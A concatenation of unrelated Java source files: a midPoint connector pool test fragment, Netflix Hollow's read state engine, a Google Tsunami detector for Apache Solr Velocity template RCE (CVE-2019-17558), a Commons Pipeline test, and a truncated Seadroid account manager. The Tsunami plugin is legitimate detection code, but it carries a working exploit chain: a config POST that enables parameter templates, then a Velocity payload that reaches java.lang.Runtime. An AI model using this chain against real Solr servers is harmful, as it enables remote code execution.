ArrayList<PrismObject<ShadowType>>(); final ResultHandler<ShadowType> handler2 = new ResultHandler<ShadowType>() { @Override public boolean handle(PrismObject<ShadowType> shadow) { checkUcfShadow(shadow, accountDefinition); searchResults2.add(shadow); return true; } }; dummyResource.setBlockOperations(true); // WHEN Thread t1 = new Thread(new Runnable() { @Override public void run() { try { cc.search(accountDefinition, new ObjectQuery(), handler1, null, null, null, null, result1); } catch (CommunicationException | GenericFrameworkException | SchemaException | SecurityViolationException | ObjectNotFoundException e) { LOGGER.error("Error in the search: {}", e.getMessage(), e); } } }); t1.setName("search1"); t1.start(); // Give the new thread a chance to get blocked Thread.sleep(500); ConnectorOperationalStatus opStat = cc.getOperationalStatus(); display("stats (blocked 1)", opStat); assertEquals("Wrong pool active", (Integer)1, opStat.getPoolStatusNumActive()); assertEquals("Wrong pool active", (Integer)0, opStat.getPoolStatusNumIdle()); assertEquals("Unexpected number of search results", 0, searchResults1.size()); Thread t2 = new Thread(new Runnable() { @Override public void run() { try { cc.search(accountDefinition, new ObjectQuery(), handler2, null, null, null, null, result2); } catch (CommunicationException | GenericFrameworkException | SchemaException | SecurityViolationException | ObjectNotFoundException e) { LOGGER.error("Error in the search: {}", e.getMessage(), e); } } }); t2.setName("search2"); t2.start(); // Give the new thread a chance to get blocked Thread.sleep(500); opStat = cc.getOperationalStatus(); display("stats (blocked 2)", opStat); assertEquals("Wrong pool active", (Integer)2, opStat.getPoolStatusNumActive()); assertEquals("Wrong pool active", (Integer)0, opStat.getPoolStatusNumIdle()); assertEquals("Unexpected number of search results", 0, searchResults1.size()); dummyResource.unblockAll(); t1.join(); t2.join(); dummyResource.setBlockOperations(false); // THEN assertEquals("Unexpected number of search results 1", 1, searchResults1.size()); assertEquals("Unexpected number of search results 2", 1, searchResults2.size()); opStat = cc.getOperationalStatus(); display("stats (final)", opStat); assertEquals("Wrong pool active", (Integer)0, opStat.getPoolStatusNumActive()); assertEquals("Wrong pool active", (Integer)2, opStat.getPoolStatusNumIdle()); PrismObject<ShadowType> searchResult1 = searchResults1.get(0); display("Search result 1", searchResult1); PrismObject<ShadowType> searchResult2 = searchResults2.get(0); display("Search result 2", searchResult2); } private void checkUcfShadow(PrismObject<ShadowType> shadow, ObjectClassComplexTypeDefinition objectClassDefinition) { assertNotNull("No objectClass in shadow "+shadow, shadow.asObjectable().getObjectClass()); assertEquals("Wrong objectClass in shadow "+shadow, objectClassDefinition.getTypeName(), shadow.asObjectable().getObjectClass()); Collection<ResourceAttribute<?>> attributes = ShadowUtil.getAttributes(shadow); assertNotNull("No attributes in shadow "+shadow, attributes); assertFalse("Empty attributes in shadow "+shadow, attributes.isEmpty()); } }
/* * Copyright 2016-2019 Netflix, Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. * */ package com.netflix.hollow.core.read.engine; import com.netflix.hollow.api.error.SchemaNotFoundException; import com.netflix.hollow.core.HollowStateEngine; import com.netflix.hollow.core.memory.pool.ArraySegmentRecycler; import com.netflix.hollow.core.memory.pool.RecyclingRecycler; import com.netflix.hollow.core.read.dataaccess.HollowDataAccess; import com.netflix.hollow.core.read.dataaccess.HollowTypeDataAccess; import com.netflix.hollow.core.read.engine.map.HollowMapTypeReadState; import com.netflix.hollow.core.read.engine.set.HollowSetTypeReadState; import com.netflix.hollow.core.read.missing.DefaultMissingDataHandler; import com.netflix.hollow.core.read.missing.MissingDataHandler; import com.netflix.hollow.core.schema.HollowListSchema; import com.netflix.hollow.core.schema.HollowMapSchema; import com.netflix.hollow.core.schema.HollowObjectSchema; import com.netflix.hollow.core.schema.HollowSchema; import com.netflix.hollow.core.schema.HollowSetSchema; import com.netflix.hollow.core.util.DefaultHashCodeFinder; import com.netflix.hollow.core.util.HollowObjectHashCodeFinder; import java.util.ArrayList; import java.util.Collection; import java.util.Collections; import java.util.HashMap; import java.util.HashSet; import java.util.List; import java.util.Map; import java.util.Set; /** * A HollowReadStateEngine is our main handle to the current state of a Hollow dataset as a data consumer. * <p> * A dataset changes over time. A core concept in Hollow is that the timeline for a changing dataset can be * broken down into discrete data states, each of which is a complete snapshot of the data at a particular point in time. * Data consumers handle data states with a HollowReadStateEngine. */ public class HollowReadStateEngine implements HollowStateEngine, HollowDataAccess { private final Map<String, HollowTypeReadState> typeStates; private final Map<String, List<HollowTypeStateListener>> listeners; private final HollowObjectHashCodeFinder hashCodeFinder; private final boolean listenToAllPopulatedOrdinals; private boolean skipTypeShardUpdateWithNoAdditions; private ArraySegmentRecycler memoryRecycler; private Map<String,String> headerTags; private Set<String> typesWithDefinedHashCodes = new HashSet<String>(); private long currentRandomizedTag; private MissingDataHandler missingDataHandler = new DefaultMissingDataHandler(); public HollowReadStateEngine() { this(DefaultHashCodeFinder.INSTANCE, true, new RecyclingRecycler()); } public HollowReadStateEngine(boolean listenToAllPopulatedOrdinals) { this(DefaultHashCodeFinder.INSTANCE, listenToAllPopulatedOrdinals, new RecyclingRecycler()); } public HollowReadStateEngine(ArraySegmentRecycler recycler) { this(DefaultHashCodeFinder.INSTANCE, true, recycler); } public HollowReadStateEngine(boolean listenToAllPopulatedOrdinals, ArraySegmentRecycler recycler) { this(DefaultHashCodeFinder.INSTANCE, listenToAllPopulatedOrdinals, recycler); } @Deprecated public HollowReadStateEngine(HollowObjectHashCodeFinder hashCodeFinder) { this(hashCodeFinder, true, new RecyclingRecycler()); } @Deprecated public HollowReadStateEngine(HollowObjectHashCodeFinder hashCodeFinder, boolean listenToAllPopulatedOrdinals, ArraySegmentRecycler recycler) { this.typeStates = new HashMap<String, HollowTypeReadState>(); this.listeners = new HashMap<String, List<HollowTypeStateListener>>(); this.hashCodeFinder = hashCodeFinder; this.memoryRecycler = recycler; this.listenToAllPopulatedOrdinals = listenToAllPopulatedOrdinals; } @Override public HollowObjectHashCodeFinder getHashCodeFinder() { return hashCodeFinder; } protected void addTypeState(HollowTypeReadState typeState) { typeStates.put(typeState.getSchema().getName(), typeState); if(listenToAllPopulatedOrdinals) { typeState.addListener(new PopulatedOrdinalListener()); } List<HollowTypeStateListener> list = listeners.get(typeState.getSchema().getName()); if(list != null) { for(HollowTypeStateListener listener : list) typeState.addListener(listener); } } /** * Add a {@link HollowTypeStateListener} to a type. * * @param typeName the type name * @param listener the listener to add */ public void addTypeListener(String typeName, HollowTypeStateListener listener) { List<HollowTypeStateListener> list = listeners.get(typeName); if(list == null) { list = new ArrayList<HollowTypeStateListener>(); listeners.put(typeName, list); } list.add(listener); HollowTypeReadState typeState = typeStates.get(typeName); if(typeState != null) typeState.addListener(listener); } void wireTypeStatesToSchemas() { for(HollowTypeReadState state : typeStates.values()) { switch(state.getSchema().getSchemaType()) { case OBJECT: HollowObjectSchema objSchema = (HollowObjectSchema)state.getSchema(); for(int i=0;i<objSchema.numFields();i++) { if(objSchema.getReferencedType(i) != null) objSchema.setReferencedTypeState(i, typeStates.get(objSchema.getReferencedType(i))); } break; case LIST: HollowListSchema listSchema = (HollowListSchema)state.getSchema(); listSchema.setElementTypeState(typeStates.get(listSchema.getElementType())); break; case SET: HollowSetSchema setSchema = (HollowSetSchema)state.getSchema(); setSchema.setElementTypeState(typeStates.get(setSchema.getElementType())); ((HollowSetTypeReadState)state).buildKeyDeriver(); break; case MAP: HollowMapSchema mapSchema = (HollowMapSchema)state.getSchema(); mapSchema.setKeyTypeState(typeStates.get(mapSchema.getKeyType())); mapSchema.setValueTypeState(typeStates.get(mapSchema.getValueType())); ((HollowMapTypeReadState)state).buildKeyDeriver(); break; } } } /** * Calculates the data size of a read state engine which is defined as the approximate heap footprint by iterating * over the read state shards in each type state * @return the heap footprint of the read state engine */ public long calcApproxDataSize() { return this.getAllTypes() .stream() .map(this::getTypeState) .mapToLong(HollowTypeReadState::getApproximateHeapFootprintInBytes) .sum(); } @Override public HollowTypeDataAccess getTypeDataAccess(String type) { return typeStates.get(type); } @Override public HollowTypeDataAccess getTypeDataAccess(String type, int ordinal) { return typeStates.get(type); } @Override public Collection<String> getAllTypes() { return typeStates.keySet(); } public HollowTypeReadState getTypeState(String type) { return typeStates.get(type); } public Collection<HollowTypeReadState> getTypeStates() { return typeStates.values(); } public ArraySegmentRecycler getMemoryRecycler() { return memoryRecycler; } public boolean isListenToAllPopulatedOrdinals() { return listenToAllPopulatedOrdinals; } /** * Experimental: When there are no updates for a type shard in a delta, skip updating that type shard. */ public void setSkipTypeShardUpdateWithNoAdditions(boolean skipTypeShardUpdateWithNoAdditions) { this.skipTypeShardUpdateWithNoAdditions = skipTypeShardUpdateWithNoAdditions; } public boolean isSkipTypeShardUpdateWithNoAdditions() { return skipTypeShardUpdateWithNoAdditions; } @Override public List<HollowSchema> getSchemas() { List<HollowSchema> schemas = new ArrayList<HollowSchema>(); for(Map.Entry<String, HollowTypeReadState> entry : typeStates.entrySet()) { schemas.add(entry.getValue().getSchema()); } return schemas; } @Override public HollowSchema getSchema(String type) { HollowTypeReadState typeState = getTypeState(type); return typeState == null ? null : typeState.getSchema(); } @Override public HollowSchema getNonNullSchema(String type) { HollowSchema schema = getSchema(type); if (schema == null) { throw new SchemaNotFoundException(type, getAllTypes()); } return schema; } protected void afterInitialization() { } public void setMissingDataHandler(MissingDataHandler handler) { this.missingDataHandler = handler; } @Override public MissingDataHandler getMissingDataHandler() { return missingDataHandler; } public void setHeaderTags(Map<String, String> headerTags) { this.headerTags = headerTags; populatedDefinedHashCodesTypesIfHeaderTagIsPresent(); } @Override public Map<String, String> getHeaderTags() { return headerTags; } @Override public String getHeaderTag(String name) { return headerTags.get(name); } public void invalidate() { listeners.clear(); for(Map.Entry<String, HollowTypeReadState> entry : typeStates.entrySet()) entry.getValue().invalidate(); memoryRecycler = null; } @Override public void resetSampling() { for(Map.Entry<String, HollowTypeReadState> entry : typeStates.entrySet()) entry.getValue().getSampler().reset(); } @Override public boolean hasSampleResults() { for(Map.Entry<String, HollowTypeReadState> entry : typeStates.entrySet()) if(entry.getValue().getSampler().hasSampleResults()) return true; return false; } public boolean updatedLastCycle() { for(Map.Entry<String, HollowTypeReadState> entry : typeStates.entrySet()) { if(entry.getValue().getListener(PopulatedOrdinalListener.class).updatedLastCycle()) return true; } return false; } public Set<String> getTypesWithDefinedHashCodes() { return typesWithDefinedHashCodes; } public long getCurrentRandomizedTag() { return currentRandomizedTag; } public void setCurrentRandomizedTag(long currentRandomizedTag) { this.currentRandomizedTag = currentRandomizedTag; } private void populatedDefinedHashCodesTypesIfHeaderTagIsPresent() { String definedHashCodesTag = headerTags.get(HollowObjectHashCodeFinder.DEFINED_HASH_CODES_HEADER_NAME); if(definedHashCodesTag == null || "".equals(definedHashCodesTag)) { this.typesWithDefinedHashCodes = Collections.<String>emptySet(); } else { Set<String>definedHashCodeTypes = new HashSet<String>(); for(String type : definedHashCodesTag.split(",")) definedHashCodeTypes.add(type); this.typesWithDefinedHashCodes = definedHashCodeTypes; } } }
/* * Copyright 2020 Google LLC * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. */ package com.google.tsunami.plugins.detectors.rce; import static com.google.common.base.Preconditions.checkNotNull; import static com.google.common.collect.ImmutableList.toImmutableList; import static com.google.tsunami.common.net.http.HttpRequest.get; import static com.google.tsunami.common.net.http.HttpRequest.post; import com.google.common.collect.ImmutableList; import com.google.common.flogger.GoogleLogger; import com.google.gson.JsonElement; import com.google.protobuf.ByteString; import com.google.protobuf.util.Timestamps; import com.google.tsunami.common.data.NetworkServiceUtils; import com.google.tsunami.common.net.http.HttpClient; import com.google.tsunami.common.net.http.HttpResponse; import com.google.tsunami.common.time.UtcClock; import com.google.tsunami.plugin.PluginType; import com.google.tsunami.plugin.VulnDetector; import com.google.tsunami.plugin.annotations.PluginInfo; import com.google.tsunami.proto.DetectionReport; import com.google.tsunami.proto.DetectionReportList; import com.google.tsunami.proto.DetectionStatus; import com.google.tsunami.proto.NetworkService; import com.google.tsunami.proto.Severity; import com.google.tsunami.proto.TargetInfo; import com.google.tsunami.proto.Vulnerability; import com.google.tsunami.proto.VulnerabilityId; import java.io.IOException; import java.time.Clock; import java.time.Instant; import javax.inject.Inject; /** A {@link VulnDetector} that detects CVE-2019-17558 in Apache Solr */ @PluginInfo( type = PluginType.VULN_DETECTION, name = "SolrVelocityTemplateRceDetector", version = "0.1", description = "Tsunami detector plugin for Apache Solr Remote Code Execution through the" + " VelocityResponseWriter (CVE-2019-17558).", author = "Tsunami Team (tsunami-dev@google.com)", bootstrapModule = SolrVelocityTemplateRceDetectorBootstrapModule.class) public final class SolrVelocityTemplateRceDetector implements VulnDetector { private static final GoogleLogger logger = GoogleLogger.forEnclosingClass(); private final Clock utcClock; private final HttpClient httpClient; @Inject SolrVelocityTemplateRceDetector(@UtcClock Clock utcClock, HttpClient httpClient) { this.utcClock = checkNotNull(utcClock); this.httpClient = checkNotNull(httpClient); } @Override public DetectionReportList detect( TargetInfo targetInfo, ImmutableList<NetworkService> matchedServices) { return DetectionReportList.newBuilder() .addAllDetectionReports( matchedServices.stream() .filter(NetworkServiceUtils::isWebService) .filter(this::isServiceVulnerable) .map(networkService -> buildDetectionReport(targetInfo, networkService)) .collect(toImmutableList())) .build(); } private boolean isServiceVulnerable(NetworkService networkService) { String writerName = "tsunami-" + utcClock.millis(); ImmutableList<String> cores = getCores(networkService); for (String core : cores) { if (createResponseWriter(networkService, core, writerName)) { // Ensure that we cleanup the response writer we just created. try { if (performExploit(networkService, core, writerName)) { return true; } } finally { cleanupResponseWriter(networkService, core, writerName); } } } return false; } private ImmutableList<String> getCores(NetworkService networkService) { String targetUri = NetworkServiceUtils.buildWebApplicationRootUrl(networkService) + "solr/admin/cores?wt=json&indexInfo=false&_=" + utcClock.millis(); try { HttpResponse response = httpClient.send(get(targetUri).withEmptyHeaders().build(), networkService); try { if (!response.bodyJson().isPresent()) { return ImmutableList.of(); } JsonElement json = response.bodyJson().get(); return ImmutableList.copyOf( json.getAsJsonObject().get("status").getAsJsonObject().keySet()); } catch (Throwable t) { logger.atInfo().log("Failed to parse cores response json"); return ImmutableList.of(); } } catch (IOException e) { logger.atWarning().withCause(e).log("Unable to query '%s'.", targetUri); return ImmutableList.of(); } } private boolean createResponseWriter( NetworkService networkService, String core, String writerName) { String targetUri = NetworkServiceUtils.buildWebApplicationRootUrl(networkService) + "solr/" + core + "/config"; String payload = String.format( "{" + "\"add-queryresponsewriter\": {" + "\"startup\": \"lazy\"," + "\"name\": \"%s\"," + "\"class\": \"solr.VelocityResponseWriter\"," + "\"template.base.dir\": \"\"," + "\"solr.resource.loader.enabled\": \"true\"," + "\"params.resource.loader.enabled\": \"true\"" + "}" + "}", writerName); try { HttpResponse response = httpClient.send( post(targetUri) .withEmptyHeaders() .setRequestBody(ByteString.copyFrom(payload, "UTF8")) .build(), networkService); return response.status().code() == 200; } catch (IOException e) { logger.atWarning().withCause(e).log("Unable to POST '%s'.", targetUri); return false; } } private boolean performExploit(NetworkService networkService, String core, String writerName) { String targetUri = NetworkServiceUtils.buildWebApplicationRootUrl(networkService) + "solr/" + core + "/select?q=1&&wt=" + writerName + "&v.template=custom&v.template.custom=" + "%23set($x='TSUNAMI')+" + "%23set($str=$x.toLowerCase().substring(4)%2b$x.substring(0,4))+" + "%23set($mem=$x.class.forName('java.lang.Runtime').getRuntime().totalMemory())+" + "$str+$mem+$str"; try { HttpResponse response = httpClient.send(get(targetUri).withEmptyHeaders().build(), networkService); if (response.status().code() != 200) { return false; } try { // A failed rce will include json in the response. Attempt to parse it and catch parsing // errors to find the response. response.bodyJson(); return false; } catch (Throwable t) { String responseStr = response.bodyString().get(); logger.atInfo().log("Got response from java injection: %s", responseStr); return responseStr.matches(".*amiTSUN [0-9]+ amiTSUN.*"); } } catch (IOException e) { logger.atWarning().withCause(e).log("Unable to query '%s'.", targetUri); return false; } } private void cleanupResponseWriter( NetworkService networkService, String core, String writerName) { String targetUri = NetworkServiceUtils.buildWebApplicationRootUrl(networkService) + "solr/" + core + "/config"; String payload = String.format("{\"delete-queryresponsewriter\": \"%s\"}", writerName); try { HttpResponse response = httpClient.send( post(targetUri) .withEmptyHeaders() .setRequestBody(ByteString.copyFrom(payload, "UTF8")) .build(), networkService); if (response.status().code() != 200) { logger.atWarning().log("Unable to cleanup response writer"); } } catch (IOException e) { logger.atWarning().withCause(e).log("Unable to POST '%s'.", targetUri); } } private DetectionReport buildDetectionReport( TargetInfo targetInfo, NetworkService vulnerableNetworkService) { return DetectionReport.newBuilder() .setTargetInfo(targetInfo) .setNetworkService(vulnerableNetworkService) .setDetectionTimestamp(Timestamps.fromMillis(Instant.now(utcClock).toEpochMilli())) .setDetectionStatus(DetectionStatus.VULNERABILITY_VERIFIED) .setVulnerability( Vulnerability.newBuilder() .setMainId( VulnerabilityId.newBuilder().setPublisher("GOOGLE").setValue("CVE_2019_17558")) .setSeverity(Severity.CRITICAL) .setTitle("Apache Solr Velocity Template RCE (CVE-2019-17558)") .setDescription( "Apache Solr 5.0.0 to Apache Solr 8.3.1 are vulnerable to a Remote Code" + " Execution through the VelocityResponseWriter. A Velocity template can" + " be provided through Velocity templates in a configset `velocity/`" + " directory or as a parameter. A user defined configset could contain" + " renderable, potentially malicious, templates. Parameter provided" + " templates are disabled by default, but can be enabled by setting" + " `params.resource.loader.enabled` by defining a response writer with" + " that setting set to `true`. Defining a response writer requires" + " configuration API access. Solr 8.4 removed the params resource loader" + " entirely, and only enables the configset-provided template rendering" + " when the configset is `trusted` (has been uploaded by an authenticated" + " user).")) .build(); } }
/* * Licensed to the Apache Software Foundation (ASF) under one or more * contributor license agreements. See the NOTICE file distributed with * this work for additional information regarding copyright ownership. * The ASF licenses this file to You under the Apache License, Version 2.0 * (the "License"); you may not use this file except in compliance with * the License. You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. */ package org.apache.commons.pipeline; import java.util.Collection; import java.util.Collections; import java.util.EventObject; import junit.framework.Test; import junit.framework.TestCase; import junit.framework.TestSuite; import org.apache.commons.pipeline.driver.SynchronousStageDriverFactory; import org.apache.commons.pipeline.event.ObjectProcessedEvent; import org.apache.commons.pipeline.listener.ObjectProcessedEventCounter; import org.apache.commons.pipeline.testFramework.TestStage; /** * Test cases */ public class PipelineTest extends TestCase { public PipelineTest(String testName) { super(testName); } public static Test suite() { TestSuite suite = new TestSuite(PipelineTest.class); return suite; } /** * Test of registerListener method, of class org.apache.commons.pipeline.Pipeline. */ public void testRegisterListener() { StageEventListener listener = new ObjectProcessedEventCounter(); Pipeline instance = new Pipeline(); instance.registerListener(listener); assertEquals(1, instance.getRegisteredListeners().size()); } /** * Test of getRegisteredListeners method, of class org.apache.commons.pipeline.Pipeline. */ public void testGetRegisteredListeners() { Pipeline instance = new Pipeline(); Collection<StageEventListener> expResult = Collections.EMPTY_LIST; Collection<StageEventListener> result = instance.getRegisteredListeners(); assertEquals(expResult, result); } /** * Test of raise method, of class org.apache.commons.pipeline.Pipeline. */ public void testRaise() throws Exception { Stage testStage = new TestStage(0); EventObject ev = new ObjectProcessedEvent(testStage, "Hello, World!"); Pipeline instance = new Pipeline(); ObjectProcessedEventCounter counter = new ObjectProcessedEventCounter(); instance.registerListener(counter); instance.raise(ev); synchronized(counter) { while (counter.getCounts().get(testStage) == null) counter.wait(100); } assertNotNull("No events were received.", counter.getCounts().get(testStage)); assertEquals("Only one event should have been received.", 1, counter.getCounts().get(testStage).intValue()); } public void testRaiseOnBranch() throws Exception { Pipeline root = new Pipeline(); Pipeline branch1 = new Pipeline(); root.addBranch("b1", branch1); Pipeline branch2 = new Pipeline(); root.addBranch("b2", branch2); ObjectProcessedEventCounter counter = new ObjectProcessedEventCounter(); branch2.registerListener(counter); Stage testStage = new TestStage(0); EventObject ev = new ObjectProcessedEvent(testStage, "Hello, World!"); branch1.raise(ev); synchronized(counter) { while (counter.getCounts().get(testStage) == null) counter.wait(100); } assertNotNull(counter.getCounts().get(testStage)); assertEquals(1, counter.getCounts().get(testStage).intValue()); } /** * Test of getDownstreamFeeder method, of class org.apache.commons.pipeline.Pipeline. */ public void testGetDownstreamFeeder() throws Exception { Stage stage1 = new TestStage(0); Stage stage2 = new TestStage(1); StageDriverFactory sdf = new SynchronousStageDriverFactory(); Pipeline instance = new Pipeline(); instance.addStage(stage1, sdf); instance.addStage(stage2, sdf); Feeder expResult = instance.getStageDriver(stage2).getFeeder(); Feeder result = instance.getDownstreamFeeder(stage1); assertSame(expResult, result); } /** * Test of getBranchFeeder method, of class org.apache.commons.pipeline.Pipeline. */ public void testGetBranchFeeder() throws Exception { String branchKey = "b1"; Pipeline root = new Pipeline(); Pipeline branch = new Pipeline(); root.addBranch(branchKey, branch); Feeder expResult = branch.getTerminalFeeder(); //no feeders registered Feeder result = root.getBranchFeeder(branchKey); assertSame(expResult, result); StageDriverFactory sdf = new SynchronousStageDriverFactory(); Stage testStage = new TestStage(0); branch.addStage(testStage, sdf); expResult = branch.getStageDriver(testStage).getFeeder(); result = root.getBranchFeeder(branchKey); assertSame(expResult, result); } // /** // * Test of addStage method, of class org.apache.commons.pipeline.Pipeline. // */ // public void testAddStage() throws Exception { // System.out.println("addStage"); // // Stage stage = null; // StageDriverFactory driverFactory = null; // Pipeline instance = new Pipeline(); // // instance.addStage(stage, driverFactory); // // fail("The test case is a prototype."); // } // // /** // * Test of getStages method, of class org.apache.commons.pipeline.Pipeline. // */ // public void testGetStages() { // System.out.println("getStages"); // // Pipeline instance = new Pipeline(); // // List<Stage> expResult = null; // List<Stage> result = instance.getStages(); // assertEquals(expResult, result); // // fail("The test case is a prototype."); // } // // /** // * Test of getStageDriver method, of class org.apache.commons.pipeline.Pipeline. // */ // public void testGetStageDriver() { // System.out.println("getStageDriver"); // // Stage stage = null; // Pipeline instance = new Pipeline(); // // StageDriver expResult = null; // StageDriver result = instance.getStageDriver(stage); // assertEquals(expResult, result); // // fail("The test case is a prototype."); // } // // /** // * Test of getStageDrivers method, of class org.apache.commons.pipeline.Pipeline. // */ // public void testGetStageDrivers() { // System.out.println("getStageDrivers"); // // Pipeline instance = new Pipeline(); // // List<StageDriver> expResult = null; // List<StageDriver> result = instance.getStageDrivers(); // assertEquals(expResult, result); // // fail("The test case is a prototype."); // } // // /** // * Test of addBranch method, of class org.apache.commons.pipeline.Pipeline. // */ // public void testAddBranch() throws Exception { // System.out.println("addBranch"); // // String key = ""; // Pipeline branch = null; // Pipeline instance = new Pipeline(); // // instance.addBranch(key, branch); // // fail("The test case is a prototype."); // } // // /** // * Test of getBranches method, of class org.apache.commons.pipeline.Pipeline. // */ // public void testGetBranches() { // System.out.println("getBranches"); // // Pipeline instance = new Pipeline(); // // Map<String, Pipeline> expResult = null; // Map<String, Pipeline> result = instance.getBranches(); // assertEquals(expResult, result); // // fail("The test case is a prototype."); // } // // /** // * Test of getSourceFeeder method, of class org.apache.commons.pipeline.Pipeline. // */ // public void testGetSourceFeeder() { // System.out.println("getSourceFeeder"); // // Pipeline instance = new Pipeline(); // // Feeder expResult = null; // Feeder result = instance.getSourceFeeder(); // assertEquals(expResult, result); // // fail("The test case is a prototype."); // } // // /** // * Test of getTerminalFeeder method, of class org.apache.commons.pipeline.Pipeline. // */ // public void testGetTerminalFeeder() { // System.out.println("getTerminalFeeder"); // // Pipeline instance = new Pipeline(); // // Feeder expResult = null; // Feeder result = instance.getTerminalFeeder(); // assertEquals(expResult, result); // // fail("The test case is a prototype."); // } // // /** // * Test of setTerminalFeeder method, of class org.apache.commons.pipeline.Pipeline. // */ // public void testSetTerminalFeeder() { // System.out.println("setTerminalFeeder"); // // Feeder terminalFeeder = null; // Pipeline instance = new Pipeline(); // // instance.setTerminalFeeder(terminalFeeder); // // fail("The test case is a prototype."); // } // // /** // * Test of start method, of class org.apache.commons.pipeline.Pipeline. // */ // public void testStart() throws Exception { // System.out.println("start"); // // Pipeline instance = new Pipeline(); // // instance.start(); // // fail("The test case is a prototype."); // } // // /** // * Test of finish method, of class org.apache.commons.pipeline.Pipeline. // */ // public void testFinish() throws Exception { // System.out.println("finish"); // // Pipeline instance = new Pipeline(); // // instance.finish(); // // fail("The test case is a prototype."); // } // // /** // * Test of run method, of class org.apache.commons.pipeline.Pipeline. // */ // public void testRun() { // System.out.println("run"); // // Pipeline instance = new Pipeline(); // // instance.run(); // // fail("The test case is a prototype."); // } // // /** // * Test of getValidator method, of class org.apache.commons.pipeline.Pipeline. // */ // public void testGetValidator() { // System.out.println("getValidator"); // // Pipeline instance = new Pipeline(); // // PipelineValidator expResult = null; // PipelineValidator result = instance.getValidator(); // assertEquals(expResult, result); // // fail("The test case is a prototype."); // } // // /** // * Test of setValidator method, of class org.apache.commons.pipeline.Pipeline. // */ // public void testSetValidator() { // System.out.println("setValidator"); // // PipelineValidator validator = null; // Pipeline instance = new Pipeline(); // // instance.setValidator(validator); // // fail("The test case is a prototype."); // } }
package com.seafile.seadroid2.account; import java.lang.reflect.Array; import java.util.ArrayList; import java.util.List; import android.content.Context; import android.content.Intent; import android.content.SharedPreferences; import com.seafile.seadroid2.SettingsManager; import com.seafile.seadroid2.cameraupload.CameraUploadService; import com.seafile.seadroid2.util.Utils; import org.json.JSONException; import org.json.JSONObject; /** * Account Manager.<br> * note the differences between {@link Account} and {@link AccountInfo}<br> * */ import com.google.common.collect.Lists; public class AccountManager { @SuppressWarnings("unused") private static String DEBUG_TAG = "AccountManager"; public static final String SHARED_PREF_NAME = "latest_account"; public static final String SHARED_PREF_SERVER_KEY = "com.seafile.seadroid.server"; public static final String SHARED_PREF_EMAIL_KEY = "com.seafile.seadroid.email"; public static final String SHARED_PREF_TOKEN_KEY = "com.seafile.seadroid.token"; public static final String INVALID_TOKEN = "not_applicable"; /** used to manage multi Accounts when user switch between different Accounts */ private SharedPreferences actMangeSharedPref; private SharedPreferences.Editor editor; private final AccountDBHelper dbHelper; private Context ctx; public AccountManager(Context context) { this.ctx = context; dbHelper = AccountDBHelper.getDatabaseHelper(context); // used to manage multi Accounts when user switch between different Accounts actMangeSharedPref = ctx.getSharedPreferences(SHARED_PREF_NAME, Context.MODE_PRIVATE); editor = actMangeSharedPref.edit(); } public Account getAccountBySignature(String signature) { List<Account> accounts = dbHelper.getAccountList(); for (int i = 0; i < accounts.size(); ++i) { if (signature.equals(accounts.get(i).getSignature())) { return accounts.get(i); } } return null; } public List<Account> getAccountList() { return dbHelper.getAccountList(); } /** * save sign in account to database * * @param account */ public void saveAccountToDB(Account account) { // save to db dbHelper.saveAccount(account); } /** * update account info from database * * @param oldAccount * @param newAccount */ public void updateAccountFromDB(Account oldAccount, Account newAccount) { dbHelper.updateAccount(oldAccount, newAccount); } public Account getCurrentAccount() { String currentServer = actMangeSharedPref.getString(SHARED_PREF_SERVER_KEY, null); String currentEmail = actMangeSharedPref.getString(SHARED_PREF_EMAIL_KEY, null); String currentToken = actMangeSharedPref.getString(SHARED_PREF_TOKEN_KEY, null); // When user sign out, the value of token will be null, then leads user to AccountsActivity if (currentServer != null && currentToken != null) { return new Account(currentServer, currentEmail, null, currentToken); } else return null; } /** * save current Account info to SharedPreference<br> * <strong>current</strong> means the Account is now in using at the foreground if has multiple accounts * * @param account */ public void saveCurrentAccount(Account account) { editor.putString(SHARED_PREF_SERVER_KEY, account.server); editor.putString(SHARED_PREF_EMAIL_KEY, account.email); editor.putString(SHARED_PREF_TOKEN_KEY, account.token); editor.commit(); } /** * delete a selected Account info from SharedPreference * * @param account */ public void deleteAccountFromSharedPreference(Account account) { String currentServer = actMangeSharedPref.getString(SHARED_PREF_SERVER_KEY, null); String currentEmail = actMangeSharedPref.getString(SHARED_PREF_EMAIL_KEY, null); if (account.server.equals(currentServer) && account.email.equals(currentEmail)) { editor.putString(SHARED_PREF_SERVER_KEY, null); editor.putString(SHARED_PREF_EMAIL_KEY, null); editor.putString(SHARED_PREF_TOKEN_KEY, null); editor.commit(); } } public void deleteCameraUploadSettingsByAccount(Account account) { // update cache data of settings module String settingsServer = actMangeSharedPref.getString(SettingsManager.SHARED_PREF_CAMERA_UPLOAD_ACCOUNT_SERVER, null); String settingsEmail = actMangeSharedPref.getString(SettingsManager.SHARED_PREF_CAMERA_UPLOAD_ACCOUNT_EMAIL, null); if (account.server.equals(settingsServer) && account.email.equals(settingsEmail)) { SettingsManager.instance().clearCameraUploadInfo(); } } public void deleteAccountFromDB(Account account) { // delete from db dbHelper.deleteAccount(account); } /** * when user sign out, delete authorized information of the current Account instance.<br> * If Camera Upload Service is running under the Account, stop the service. * */ public void signOutCurrentAccount() { Account currentAccount = getCurrentAccount(); // delete token of the account from database Account accountWithoutToken = new Account(currentAccount.getServer(), currentAccount.getEmail(), null, INVALID_TOKEN); updateAccountFromDB(currentAccount, accountWithoutToken); // delete data in Shared_prefs deleteAccountFromSharedPreference(currentAccount); // stop camera upload service if on stopCamerUploadServiceByAccount(currentAccount); // keep Gesture lock settings } /** * turn off camera upload service of the deleted account if it was turned on before * * @param account */ public void stopCamerUploadServiceByAccount(Account account) { String camerUploadEmail = 